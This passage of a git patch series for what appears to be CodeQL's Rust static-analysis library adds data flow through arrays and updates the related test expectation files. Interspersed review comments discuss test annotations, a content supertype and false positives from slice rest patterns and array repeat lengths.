ExprStmt | variables.rs:549:5:549:18 | match_pattern5 | | +| variables.rs:550:5:550:18 | match_pattern6 | variables.rs:550:5:550:20 | match_pattern6(...) | | +| variables.rs:550:5:550:20 | match_pattern6(...) | variables.rs:551:5:551:21 | ExprStmt | | +| variables.rs:550:5:550:21 | ExprStmt | variables.rs:550:5:550:18 | match_pattern6 | | +| variables.rs:551:5:551:18 | match_pattern7 | variables.rs:551:5:551:20 | match_pattern7(...) | | +| variables.rs:551:5:551:20 | match_pattern7(...) | variables.rs:552:5:552:21 | ExprStmt | | +| variables.rs:551:5:551:21 | ExprStmt | variables.rs:551:5:551:18 | match_pattern7 | | +| variables.rs:552:5:552:18 | match_pattern8 | variables.rs:552:5:552:20 | match_pattern8(...) | | +| variables.rs:552:5:552:20 | match_pattern8(...) | variables.rs:553:5:553:21 | ExprStmt | | +| variables.rs:552:5:552:21 | ExprStmt | variables.rs:552:5:552:18 | match_pattern8 | | +| variables.rs:553:5:553:18 | match_pattern9 | variables.rs:553:5:553:20 | match_pattern9(...) | | +| variables.rs:553:5:553:20 | match_pattern9(...) 
| variables.rs:554:5:554:36 | ExprStmt | | +| variables.rs:553:5:553:21 | ExprStmt | variables.rs:553:5:553:18 | match_pattern9 | | +| variables.rs:554:5:554:18 | param_pattern1 | variables.rs:554:20:554:22 | "a" | | +| variables.rs:554:5:554:35 | param_pattern1(...) | variables.rs:555:5:555:37 | ExprStmt | | +| variables.rs:554:5:554:36 | ExprStmt | variables.rs:554:5:554:18 | param_pattern1 | | +| variables.rs:554:20:554:22 | "a" | variables.rs:554:26:554:28 | "b" | | +| variables.rs:554:25:554:34 | TupleExpr | variables.rs:554:5:554:35 | param_pattern1(...) | | +| variables.rs:554:26:554:28 | "b" | variables.rs:554:31:554:33 | "c" | | +| variables.rs:554:31:554:33 | "c" | variables.rs:554:25:554:34 | TupleExpr | | +| variables.rs:555:5:555:18 | param_pattern2 | variables.rs:555:20:555:31 | ...::Left | | +| variables.rs:555:5:555:36 | param_pattern2(...) | variables.rs:556:5:556:26 | ExprStmt | | +| variables.rs:555:5:555:37 | ExprStmt | variables.rs:555:5:555:18 | param_pattern2 | | +| variables.rs:555:20:555:31 | ...::Left | variables.rs:555:33:555:34 | 45 | | +| variables.rs:555:20:555:35 | ...::Left(...) | variables.rs:555:5:555:36 | param_pattern2(...) | | +| variables.rs:555:33:555:34 | 45 | variables.rs:555:20:555:35 | ...::Left(...) | | +| variables.rs:556:5:556:23 | destruct_assignment | variables.rs:556:5:556:25 | destruct_assignment(...) | | +| variables.rs:556:5:556:25 | destruct_assignment(...) | variables.rs:557:5:557:23 | ExprStmt | | +| variables.rs:556:5:556:26 | ExprStmt | variables.rs:556:5:556:23 | destruct_assignment | | +| variables.rs:557:5:557:20 | closure_variable | variables.rs:557:5:557:22 | closure_variable(...) | | +| variables.rs:557:5:557:22 | closure_variable(...) | variables.rs:558:5:558:19 | ExprStmt | | +| variables.rs:557:5:557:23 | ExprStmt | variables.rs:557:5:557:20 | closure_variable | | +| variables.rs:558:5:558:16 | for_variable | variables.rs:558:5:558:18 | for_variable(...) 
| | +| variables.rs:558:5:558:18 | for_variable(...) | variables.rs:559:5:559:17 | ExprStmt | | +| variables.rs:558:5:558:19 | ExprStmt | variables.rs:558:5:558:16 | for_variable | | +| variables.rs:559:5:559:14 | add_assign | variables.rs:559:5:559:16 | add_assign(...) | | +| variables.rs:559:5:559:16 | add_assign(...) | variables.rs:560:5:560:13 | ExprStmt | | +| variables.rs:559:5:559:17 | ExprStmt | variables.rs:559:5:559:14 | add_assign | | +| variables.rs:560:5:560:10 | mutate | variables.rs:560:5:560:12 | mutate(...) | | +| variables.rs:560:5:560:12 | mutate(...) | variables.rs:561:5:561:17 | ExprStmt | | +| variables.rs:560:5:560:13 | ExprStmt | variables.rs:560:5:560:10 | mutate | | +| variables.rs:561:5:561:14 | mutate_arg | variables.rs:561:5:561:16 | mutate_arg(...) | | +| variables.rs:561:5:561:16 | mutate_arg(...) | variables.rs:562:5:562:12 | ExprStmt | | +| variables.rs:561:5:561:17 | ExprStmt | variables.rs:561:5:561:14 | mutate_arg | | +| variables.rs:562:5:562:9 | alias | variables.rs:562:5:562:11 | alias(...) | | +| variables.rs:562:5:562:11 | alias(...) | variables.rs:563:5:563:18 | ExprStmt | | +| variables.rs:562:5:562:12 | ExprStmt | variables.rs:562:5:562:9 | alias | | +| variables.rs:563:5:563:15 | capture_mut | variables.rs:563:5:563:17 | capture_mut(...) | | +| variables.rs:563:5:563:17 | capture_mut(...) | variables.rs:564:5:564:20 | ExprStmt | | +| variables.rs:563:5:563:18 | ExprStmt | variables.rs:563:5:563:15 | capture_mut | | +| variables.rs:564:5:564:17 | capture_immut | variables.rs:564:5:564:19 | capture_immut(...) | | +| variables.rs:564:5:564:19 | capture_immut(...) | variables.rs:565:5:565:26 | ExprStmt | | +| variables.rs:564:5:564:20 | ExprStmt | variables.rs:564:5:564:17 | capture_immut | | +| variables.rs:565:5:565:23 | async_block_capture | variables.rs:565:5:565:25 | async_block_capture(...) | | +| variables.rs:565:5:565:25 | async_block_capture(...) 
| variables.rs:566:5:566:14 | ExprStmt | | +| variables.rs:565:5:565:26 | ExprStmt | variables.rs:565:5:565:23 | async_block_capture | | +| variables.rs:566:5:566:11 | structs | variables.rs:566:5:566:13 | structs(...) | | +| variables.rs:566:5:566:13 | structs(...) | variables.rs:567:5:567:14 | ExprStmt | | +| variables.rs:566:5:566:14 | ExprStmt | variables.rs:566:5:566:11 | structs | | +| variables.rs:567:5:567:11 | ref_arg | variables.rs:567:5:567:13 | ref_arg(...) | | +| variables.rs:567:5:567:13 | ref_arg(...) | variables.rs:568:5:568:30 | ExprStmt | | +| variables.rs:567:5:567:14 | ExprStmt | variables.rs:567:5:567:11 | ref_arg | | +| variables.rs:568:5:568:27 | ref_methodcall_receiver | variables.rs:568:5:568:29 | ref_methodcall_receiver(...) | | +| variables.rs:568:5:568:29 | ref_methodcall_receiver(...) | variables.rs:535:11:569:1 | { ... } | | +| variables.rs:568:5:568:30 | ExprStmt | variables.rs:568:5:568:27 | ref_methodcall_receiver | | breakTarget continueTarget diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index ac6ec176a29..2898dac871e 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected @@ -6,7 +6,7 @@ nonSsaVariable | variables.rs:392:13:392:13 | x | | variables.rs:426:13:426:13 | z | | variables.rs:492:13:492:13 | a | -| variables.rs:520:11:520:11 | a | +| variables.rs:529:11:529:11 | a | definition | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | 
@@ -136,9 +136,12 @@ definition | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | -| variables.rs:501:9:501:9 | x | variables.rs:501:9:501:9 | x | -| variables.rs:505:9:505:9 | z | variables.rs:505:9:505:9 | z | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:514:15:514:18 | self | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | +| variables.rs:514:9:514:9 | z | variables.rs:514:9:514:9 | z | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | read | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | 
@@ -262,8 +265,11 @@ read | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:9 | x | variables.rs:501:9:501:9 | x | variables.rs:503:15:503:15 | x | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:514:15:514:18 | self | variables.rs:515:6:515:9 | self | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | +| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | firstRead | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | 
@@ -364,8 +370,11 @@ firstRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:9 | x | variables.rs:501:9:501:9 | x | variables.rs:503:15:503:15 | x | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:514:15:514:18 | self | variables.rs:515:6:515:9 | self | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | +| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | lastRead | variables.rs:3:14:3:14 | s | variables.rs:3:14:3:14 | s | variables.rs:4:20:4:20 | s | | variables.rs:7:14:7:14 | i | variables.rs:7:14:7:14 | i | variables.rs:8:20:8:20 | i | 
@@ -467,8 +476,11 @@ lastRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:9 | x | variables.rs:501:9:501:9 | x | variables.rs:503:15:503:15 | x | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:514:15:514:18 | self | variables.rs:515:6:515:9 | self | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | +| variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | adjacentReads | variables.rs:35:9:35:10 | x3 | variables.rs:35:9:35:10 | x3 | variables.rs:36:15:36:16 | x3 | variables.rs:38:9:38:10 | x3 | | variables.rs:43:9:43:10 | x4 | variables.rs:43:9:43:10 | x4 | variables.rs:44:15:44:16 | x4 | variables.rs:49:15:49:16 | x4 | @@ -571,3 +583,4 @@ assigns | variables.rs:438:9:438:9 | i | variables.rs:438:13:438:13 | 1 | | variables.rs:450:9:450:9 | x | variables.rs:450:13:450:13 | 2 | | variables.rs:454:9:454:9 | x | variables.rs:454:13:454:13 | 3 | +| variables.rs:505:5:505:5 | a | variables.rs:505:9:505:17 | [...] | diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index 9abee1df82e..7d83ec1fbc5 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected 
@@ -1,4 +1,6 @@ testFailures +| variables.rs:503:5:503:5 | a | Unexpected result: write_access=a | +| variables.rs:503:15:503:32 | //... | Missing result: read_access=a | failures variable | variables.rs:3:14:3:14 | s | @@ -98,10 +100,11 @@ variable | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | self | | variables.rs:492:13:492:13 | a | -| variables.rs:501:9:501:9 | x | -| variables.rs:505:9:505:9 | z | -| variables.rs:514:15:514:18 | self | -| variables.rs:520:11:520:11 | a | +| variables.rs:501:13:501:13 | a | +| variables.rs:510:9:510:9 | x | +| variables.rs:514:9:514:9 | z | +| variables.rs:523:15:523:18 | self | +| variables.rs:529:11:529:11 | a | variableAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | | variables.rs:8:20:8:20 | i | variables.rs:7:14:7:14 | i | 
@@ -256,12 +259,17 @@ variableAccess | variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | | variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | | variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:502:20:502:20 | x | variables.rs:501:9:501:9 | x | -| variables.rs:503:15:503:15 | x | variables.rs:501:9:501:9 | x | -| variables.rs:506:20:506:20 | z | variables.rs:505:9:505:9 | z | -| variables.rs:515:6:515:9 | self | variables.rs:514:15:514:18 | self | -| variables.rs:521:3:521:3 | a | variables.rs:520:11:520:11 | a | -| variables.rs:523:13:523:13 | a | variables.rs:520:11:520:11 | a | +| variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:511:20:511:20 | x | variables.rs:510:9:510:9 | x | +| variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | +| variables.rs:515:20:515:20 | z | variables.rs:514:9:514:9 | z | +| variables.rs:524:6:524:9 | self | variables.rs:523:15:523:18 | self | +| variables.rs:530:3:530:3 | a | variables.rs:529:11:529:11 | a | +| variables.rs:532:13:532:13 | a | variables.rs:529:11:529:11 | a | variableWriteAccess | variables.rs:23:5:23:6 | x2 | variables.rs:21:13:21:14 | x2 | | variables.rs:30:5:30:5 | x | variables.rs:28:13:28:13 | x | 
@@ -273,6 +281,8 @@ variableWriteAccess | variables.rs:450:9:450:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:454:9:454:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variableReadAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | | variables.rs:8:20:8:20 | i | variables.rs:7:14:7:14 | i | @@ -408,10 +418,13 @@ variableReadAccess | variables.rs:494:5:494:5 | a | variables.rs:492:13:492:13 | a | | variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | | variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:503:15:503:15 | x | variables.rs:501:9:501:9 | x | -| variables.rs:515:6:515:9 | self | variables.rs:514:15:514:18 | self | -| variables.rs:521:3:521:3 | a | variables.rs:520:11:520:11 | a | -| variables.rs:523:13:523:13 | a | variables.rs:520:11:520:11 | a | +| variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | +| variables.rs:524:6:524:9 | self | variables.rs:523:15:523:18 | self | +| variables.rs:530:3:530:3 | a | variables.rs:529:11:529:11 | a | +| variables.rs:532:13:532:13 | a | variables.rs:529:11:529:11 | a | variableInitializer | variables.rs:16:9:16:10 | x1 | variables.rs:16:14:16:16 | "a" | | variables.rs:21:13:21:14 | x2 | variables.rs:21:18:21:18 | 4 | 
@@ -460,9 +473,10 @@ variableInitializer | variables.rs:446:13:446:13 | x | variables.rs:446:17:446:17 | 1 | | variables.rs:462:9:462:9 | x | variables.rs:462:13:462:13 | 1 | | variables.rs:492:13:492:13 | a | variables.rs:492:17:492:35 | MyStruct {...} | -| variables.rs:501:9:501:9 | x | variables.rs:501:13:501:14 | 16 | -| variables.rs:505:9:505:9 | z | variables.rs:505:13:505:14 | 17 | -| variables.rs:520:11:520:11 | a | variables.rs:520:15:520:33 | MyStruct {...} | +| variables.rs:501:13:501:13 | a | variables.rs:501:17:501:25 | [...] | +| variables.rs:510:9:510:9 | x | variables.rs:510:13:510:14 | 16 | +| variables.rs:514:9:514:9 | z | variables.rs:514:13:514:14 | 17 | +| variables.rs:529:11:529:11 | a | variables.rs:529:15:529:33 | MyStruct {...} | capturedVariable | variables.rs:400:9:400:9 | x | | variables.rs:410:13:410:13 | x | diff --git a/rust/ql/test/library-tests/variables/variables.rs b/rust/ql/test/library-tests/variables/variables.rs index 4bab6d12aea..61bd3d72002 100644 --- a/rust/ql/test/library-tests/variables/variables.rs +++ b/rust/ql/test/library-tests/variables/variables.rs @@ -497,6 +497,15 @@ fn structs() { print_i64(a.my_get()); // $ read_access=a } +fn arrays() { + let mut a = [1, 2, 3]; // a + print_i64(a[0]); // $ read_access=a + a[1] = 5; // $ read_access=a + print_i64(a[1]); // $ read_access=a + a = [4, 5, 6]; // $ write_access=a + print_i64(a[2]); // $ read_access=a +} + fn ref_arg() { let x = 16; // x print_i64_ref(&x); // $ access=x From cac4514eae6d1072c771f76aedee2e8842309dac Mon Sep 17 00:00:00 2001 
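Review bot: The annotation on `a[1] = 5; // $ read_access=a` in the new `arrays` function does not match what the library reports at this commit: the accompanying variables.expected gains two `testFailures` rows for line 503 (an unexpected `write_access=a` and a missing `read_access=a`). Other tests in this series mark known gaps with `MISSING:` and `SPURIOUS:` so that `testFailures` stays empty; here that would be `a[1] = 5; // $ MISSING: read_access=a SPURIOUS: write_access=a`, flipped back once the library is fixed. Judging from the call sequence in the CFG expectations, `arrays()` is also not invoked alongside the other test functions (`structs()` is followed directly by `ref_arg()`), which looks like an omission.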
From: Simon Friis Vindum Date: Tue, 3 Dec 2024 13:56:55 +0100 Subject: [PATCH 0778/1267] Rust: Add basic data flow through arrays --- .../rust/dataflow/internal/DataFlowImpl.qll | 44 ++++++++++++- .../rust/elements/internal/VariableImpl.qll | 3 +- .../dataflow/local/DataFlowStep.expected | 40 +++++++++++- .../dataflow/local/inline-flow.expected | 65 +++++++++++++++++++ .../test/library-tests/dataflow/local/main.rs | 16 ++--- .../test/library-tests/variables/Ssa.expected | 10 +-- .../variables/variables.expected | 4 +- 7 files changed, 162 insertions(+), 20 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index a474d778e4e..0246af05bcd 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll @@ -623,6 +623,15 @@ private class StructFieldContent extends Content, TStructFieldContent { override string toString() { result = s.toString() + "." + field_.toString() } } +/** + * Content stored at an element in an array. + */ +final private class ArrayElementContent extends VariantContent, TArrayElement { + ArrayElementContent() { this = TArrayElement() } + + override string toString() { result = "array[]" } +} + /** * Content stored at a position in a tuple. * 
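Review bot: `ArrayElementContent` is declared with `VariantContent` as its supertype, while the neighbouring `StructFieldContent` extends `Content` directly. `VariantContent` is defined outside this hunk; if it models enum-variant contents, as its name suggests, any predicate ranging over `VariantContent` would now also see array elements, so `final private class ArrayElementContent extends Content, TArrayElement` looks like the intended declaration. The QLDoc could also say that one content value stands for every index, for example `Content stored at an element in an array. All elements share this content, so flow is not index-sensitive.`, since that is what produces the `SPURIOUS` results recorded in main.rs.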
@@ -884,6 +893,24 @@ module RustDataFlow implements InputSig { node1.asExpr() = access.getExpr() and node2.asExpr() = access ) + or + exists(IndexExprCfgNode arr | + c instanceof ArrayElementContent and + node1.asExpr() = arr.getBase() and + node2.asExpr() = arr + ) + or + exists(ForExprCfgNode for | + c instanceof ArrayElementContent and + node1.asExpr() = for.getIterable() and + node2.asPat() = for.getPat() + ) + or + exists(SlicePatCfgNode pat | + c instanceof ArrayElementContent and + node1.asPat() = pat and + node2.asPat() = pat.getAPat() + ) ) or FlowSummaryImpl::Private::Steps::summaryReadStep(node1.(Node::FlowSummaryNode).getSummaryNode(), @@ -950,7 +977,20 @@ module RustDataFlow implements InputSig { node2.asExpr() = tuple ) or + exists(ArrayExprCfgNode arr | + c instanceof ArrayElementContent and + node1.asExpr() = arr.getAnExpr() and + node2.asExpr() = arr + ) + or tupleAssignment(node1, node2.(PostUpdateNode).getPreUpdateNode(), c) + or + exists(AssignmentExprCfgNode assignment, IndexExprCfgNode index | + c instanceof ArrayElementContent and + assignment.getLhs() = index and + node1.asExpr() = assignment.getRhs() and + node2.(PostUpdateNode).getPreUpdateNode().asExpr() = index.getBase() + ) ) or FlowSummaryImpl::Private::Steps::summaryStoreStep(node1.(Node::FlowSummaryNode).getSummaryNode(), @@ -1050,7 +1090,8 @@ private module Cached { TSourceParameterNode(ParamBaseCfgNode p) or TPatNode(PatCfgNode p) or TExprPostUpdateNode(ExprCfgNode e) { - isArgumentForCall(e, _, _) or e = any(FieldExprCfgNode access).getExpr() + isArgumentForCall(e, _, _) or + e = [any(IndexExprCfgNode i).getBase(), any(FieldExprCfgNode access).getExpr()] } or TSsaNode(SsaImpl::DataFlowIntegration::SsaNode node) or TFlowSummaryNode(FlowSummaryImpl::Private::SummaryNode sn) 
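Review bot: The `SlicePatCfgNode` read step in the `@@ -884,6 +893,24 @@` hunk uses `pat.getAPat()` for every sub-pattern, which would include a rest binding if `getAPat()` yields one. Such a binding holds a sub-slice rather than a single element, so reading `array[]` into it drops one level of content; the value should reach the binding still wrapped in `array[]`. Consider excluding rest patterns from this disjunct, or at least recording the limitation above it with `// NOTE: a rest pattern binds a sub-slice, not an element; not handled here`. The enclosing predicate starts outside the hunk.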
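Review bot: The `ArrayExprCfgNode` store step in the `@@ -950,7 +977,20 @@` hunk takes every `arr.getAnExpr()`, and for the repeat form this includes the length operand: DataFlowStep.expected in this commit lists a store of `10` into `array[]` for `[source(20); 10]` (main.rs:318:29). A length computed from untrusted data would then be reported as flowing into the array's elements, which is a false positive in any taint query built on this library. Restrict the disjunct to the element operand(s), and until the AST exposes that distinction mark it with `// FIXME: for [e; n] this also stores the length n as an element`. The index-assignment disjunct likewise never clears other indices, which the `SPURIOUS` annotation on `sink(mut_arr[0])` already documents. The enclosing predicate starts outside the hunk.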
@@ -1135,6 +1176,7 @@ private module Cached { TVariantFieldContent(VariantCanonicalPath v, string field) { field = v.getVariant().getFieldList().(RecordFieldList).getAField().getName().getText() } or + TArrayElement() or TTuplePositionContent(int pos) { pos in [0 .. max([ any(TuplePat pat).getNumberOfFields(), diff --git a/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll index a9758c455b9..622e72c5e3e 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll @@ -467,7 +467,8 @@ module Impl { assignmentExprDescendant(mid) and getImmediateParent(e) = mid and not mid.(PrefixExpr).getOperatorName() = "*" and - not mid instanceof FieldExpr + not mid instanceof FieldExpr and + not mid instanceof IndexExpr ) } diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index 6828fdf9b7e..edea0cc27ec 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected 
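Review bot: The new conjunct `not mid instanceof IndexExpr` in VariableImpl.qll carries no comment saying why an index expression stops the descent, and the exclusion list (`*` dereference, `FieldExpr`, now `IndexExpr`) is becoming hard to read as a rule. A line above it such as `// a[i] = e reads a and i; only the element is written, so neither is a write access` would state the intent, which matches the move of variables.rs:503:5 from `variableWriteAccess` to `variableReadAccess` in the expected output. The enclosing predicate starts outside the hunk, so its existing documentation is not visible here.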
@@ -388,11 +388,14 @@ localStep | main.rs:351:9:351:19 | [SSA] mut_arr | main.rs:352:10:352:16 | mut_arr | | main.rs:351:9:351:19 | mut_arr | main.rs:351:9:351:19 | [SSA] mut_arr | | main.rs:351:23:351:31 | [...] | main.rs:351:9:351:19 | mut_arr | -| main.rs:354:5:354:11 | [SSA] mut_arr | main.rs:355:13:355:19 | mut_arr | -| main.rs:354:5:354:11 | mut_arr | main.rs:354:5:354:11 | [SSA] mut_arr | +| main.rs:352:10:352:16 | [post] mut_arr | main.rs:354:5:354:11 | mut_arr | +| main.rs:352:10:352:16 | mut_arr | main.rs:354:5:354:11 | mut_arr | +| main.rs:354:5:354:11 | [post] mut_arr | main.rs:355:13:355:19 | mut_arr | +| main.rs:354:5:354:11 | mut_arr | main.rs:355:13:355:19 | mut_arr | | main.rs:354:18:354:27 | source(...) | main.rs:354:5:354:14 | mut_arr[1] | | main.rs:355:9:355:9 | [SSA] d | main.rs:356:10:356:10 | d | | main.rs:355:9:355:9 | d | main.rs:355:9:355:9 | [SSA] d | +| main.rs:355:13:355:19 | [post] mut_arr | main.rs:357:10:357:16 | mut_arr | | main.rs:355:13:355:19 | mut_arr | main.rs:357:10:357:16 | mut_arr | | main.rs:355:13:355:22 | mut_arr[1] | main.rs:355:9:355:9 | d | storeStep 
@@ -436,6 +439,27 @@ storeStep | main.rs:276:41:276:41 | 2 | D | main.rs:276:14:276:43 | ...::D {...} | | main.rs:294:18:294:27 | source(...) | C | main.rs:293:14:295:5 | C {...} | | main.rs:296:27:296:27 | 2 | D | main.rs:296:14:296:29 | D {...} | +| main.rs:314:17:314:17 | 1 | array[] | main.rs:314:16:314:33 | [...] | +| main.rs:314:20:314:20 | 2 | array[] | main.rs:314:16:314:33 | [...] | +| main.rs:314:23:314:32 | source(...) | array[] | main.rs:314:16:314:33 | [...] | +| main.rs:318:17:318:26 | source(...) | array[] | main.rs:318:16:318:31 | [...] | +| main.rs:318:29:318:30 | 10 | array[] | main.rs:318:16:318:31 | [...] | +| main.rs:322:17:322:17 | 1 | array[] | main.rs:322:16:322:24 | [...] | +| main.rs:322:20:322:20 | 2 | array[] | main.rs:322:16:322:24 | [...] | +| main.rs:322:23:322:23 | 3 | array[] | main.rs:322:16:322:24 | [...] | +| main.rs:328:17:328:17 | 1 | array[] | main.rs:328:16:328:33 | [...] | +| main.rs:328:20:328:20 | 2 | array[] | main.rs:328:16:328:33 | [...] | +| main.rs:328:23:328:32 | source(...) | array[] | main.rs:328:16:328:33 | [...] | +| main.rs:333:17:333:17 | 1 | array[] | main.rs:333:16:333:24 | [...] | +| main.rs:333:20:333:20 | 2 | array[] | main.rs:333:16:333:24 | [...] | +| main.rs:333:23:333:23 | 3 | array[] | main.rs:333:16:333:24 | [...] | +| main.rs:340:17:340:17 | 1 | array[] | main.rs:340:16:340:33 | [...] | +| main.rs:340:20:340:20 | 2 | array[] | main.rs:340:16:340:33 | [...] | +| main.rs:340:23:340:32 | source(...) | array[] | main.rs:340:16:340:33 | [...] | +| main.rs:351:24:351:24 | 1 | array[] | main.rs:351:23:351:31 | [...] | +| main.rs:351:27:351:27 | 2 | array[] | main.rs:351:23:351:31 | [...] | +| main.rs:351:30:351:30 | 3 | array[] | main.rs:351:23:351:31 | [...] | +| main.rs:354:18:354:27 | source(...) | array[] | main.rs:354:5:354:11 | [post] mut_arr | | main.rs:364:27:364:27 | 0 | Some | main.rs:364:22:364:28 | Some(...) 
| readStep | file://:0:0:0:0 | [summary param] self in lang:core::_::::unwrap | Some | file://:0:0:0:0 | [summary] read: Argument[self].Variant[crate::option::Option::Some(0)] in lang:core::_::::unwrap | @@ -484,3 +508,15 @@ readStep | main.rs:302:28:302:43 | D {...} | D | main.rs:302:41:302:41 | n | | main.rs:305:9:305:24 | C {...} | C | main.rs:305:22:305:22 | n | | main.rs:306:9:306:24 | D {...} | D | main.rs:306:22:306:22 | n | +| main.rs:315:14:315:17 | arr1 | array[] | main.rs:315:14:315:20 | arr1[2] | +| main.rs:319:14:319:17 | arr2 | array[] | main.rs:319:14:319:20 | arr2[4] | +| main.rs:323:14:323:17 | arr3 | array[] | main.rs:323:14:323:20 | arr3[2] | +| main.rs:329:15:329:18 | arr1 | array[] | main.rs:329:9:329:10 | n1 | +| main.rs:334:15:334:18 | arr2 | array[] | main.rs:334:9:334:10 | n2 | +| main.rs:342:9:342:17 | SlicePat | array[] | main.rs:342:10:342:10 | a | +| main.rs:342:9:342:17 | SlicePat | array[] | main.rs:342:13:342:13 | b | +| main.rs:342:9:342:17 | SlicePat | array[] | main.rs:342:16:342:16 | c | +| 